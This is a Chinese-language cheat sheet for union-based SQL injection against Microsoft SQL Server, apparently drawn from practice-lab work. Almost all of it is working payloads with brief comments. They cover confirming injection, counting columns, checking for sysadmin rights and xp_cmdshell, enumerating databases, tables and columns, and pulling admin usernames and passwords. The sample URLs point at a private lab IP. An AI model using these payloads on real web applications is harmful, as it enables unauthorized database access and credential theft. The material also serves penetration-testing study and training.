本章目录:
联合查询注入语句
-
第一步 判断注入
and 1=1
and 1=2
-
第二步 猜解列数(字段长度)
order by 1 返回正确
order by 2 返回正确
order by 3 出现错误
?id=-2union all select null,null,null,null--
//在第四个的时候页面显示正常,说明字段为4?id=2and 1=(select is_srvrolemember(‘sysadmin’))
//判断是否是系统管理员?id=2and 1=(select is_srvrolemember(‘db_owner’))
//判断是否是库权限?id=2and 1=(select is_srvrolemember(‘public’))
//判断是否为public权限可以直接不用加 - 报错
判断回显位的位置:?id=-2union all select ‘1’,‘2’,‘3’,‘4’-- 页面显示2,3,说明回显点为2,3字段处
利用回显点权限判断
?id=-1073UNION ALL SELECT NULL, 回显点 ,NULL,NULL--
//一般都是代入在这语句的回显点中
其实这里面在后面添加的--或者#是因为代入数据库查询的时候系统可能会给你附加一些语句,这些语句都有可能会影响你的代码,所以就可以加这个注释掉。
-
@@version //主机版本
-
system_user //系统用户名
-
suser_sname() //查出当前操作数据库的登入名
-
user //当前用户名
-
db_name() //当前数据库名
db_name(7) //快速查询库名,1-6为系统库,7开始为其他库
-
(select host_name()) //主机名
-
(select count(*) from master.dbo.sysobjects where xtype=‘X’ and name=‘xp_cmdshell’)
//判断是否有xp_cmdshell扩展存储,1为存在
- 同理:(select count(*) from master.dbo.sysobjects where name=‘xp_regread’)
//判断是否有xp_regread扩展存储,1为存在
查库:
- (select name from master.dbo.sysdatabases where dbid=7)
//修改dbid数值,快速查询库名,1-6为系统库
查表:
-
(select top 1 name from sysobjects where xtype=‘U’) //查询当前库第一个表名
-
(select top 1 name from sysobjects where xtype=‘U’ and name not in (‘表名1’,‘表名2’)) //查询其他表
-
(select top 1 table_name from master.information_schema.tables) //查询master库第一个表名
-
(select top 1 name from bbs.dbo.sysobjects where xtype=‘U’) //查询bbs库第一个表名
-
(select top 1 table_name from information_schema.tables where table_name not in (‘表名1’,‘表名2’)) //查询其他表(不包括)
-
(select name from sysobjects where xtype=‘U’ FOR XML PATH(’’)) //快速查询所有表
-
(select ‘|’%2bname%2b’|’ from sysobjects where xtype=‘U’ FOR XML PATH(’’)) //快速查询所有表
同上一条,这是过滤用的,将空格编码化了
- (select top 1 name from sysobjects where xtype=‘U’ and name not in(select top 0 name from sysobjects where xtype=‘u’))
///(select top 0 name from ) 变化0来快速查询
墨者学院例,查表名:
?id=-1073UNION ALL SELECT NULL,(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=‘dbo’),NULL,NULL--
//结果:manage
查列名:
-
(select top 1 name from syscolumns where id=object_id(‘admin’))
//查询当前库admin表的第一个列名 -
(select top 1 name from syscolumns where id=object_id(‘admin’) and name not in(‘列名1’,‘列名2’)
//查询当前库admin表的其他列名(也是不包括原理) -
(select top 1 column_name from information_schema.columns where table_name=‘admin’ and column_name not in(‘列名1’,‘列名2’))
//查询当前库admin表的其他列名 -
(select name from syscolumns where id=object_id(‘admin’) FOR XML PATH(’’))
//快速查询所有列
例:
?id=-2union all select ‘1’,(select top 1 col_name(object_id(‘manage’),3) from sysobjects),‘1’,‘1’--
//根据col_name()函数中的数字来决定显示的字段,1对应id,2对应username,3对应password
查列内容:
例:
-
?id=-2union all select null,username,password,null from manage--
///直接代列名到回显点里面,然后from 表名-- -
(select password,username from manage FOR XML PATH(’’))
//快速查询manage表里所有值 -
(select top 1 password from admin where password not in (‘值1’,‘值2’))
//查询其他值 -
(select top 1 password from bbs.dbo.admin)
//查询bbs库admin表password列的第一个值
-----------------------------------------------------------------------------------------------------------------
联合注入例:
mssql联合注入我们一般不使用 数字占位,而是null,因为你使用数字占位可能会发生隐式转换
http://192.168.130.137/1.aspx?id=1 union select 1,2,3
http://192.168.130.137/1.aspx?id=1 union select null,name,pass from info
当然也可以这样用
http://192.168.130.137/1.aspx?id=1 SELECT 1 UNION (select CAST(USER as int))
在mssql中我们如果想查询多条数据可以使用%2B 也就是加号
http://192.168.130.137/1.aspx?id=1 union select null,name%2Bpass,null from info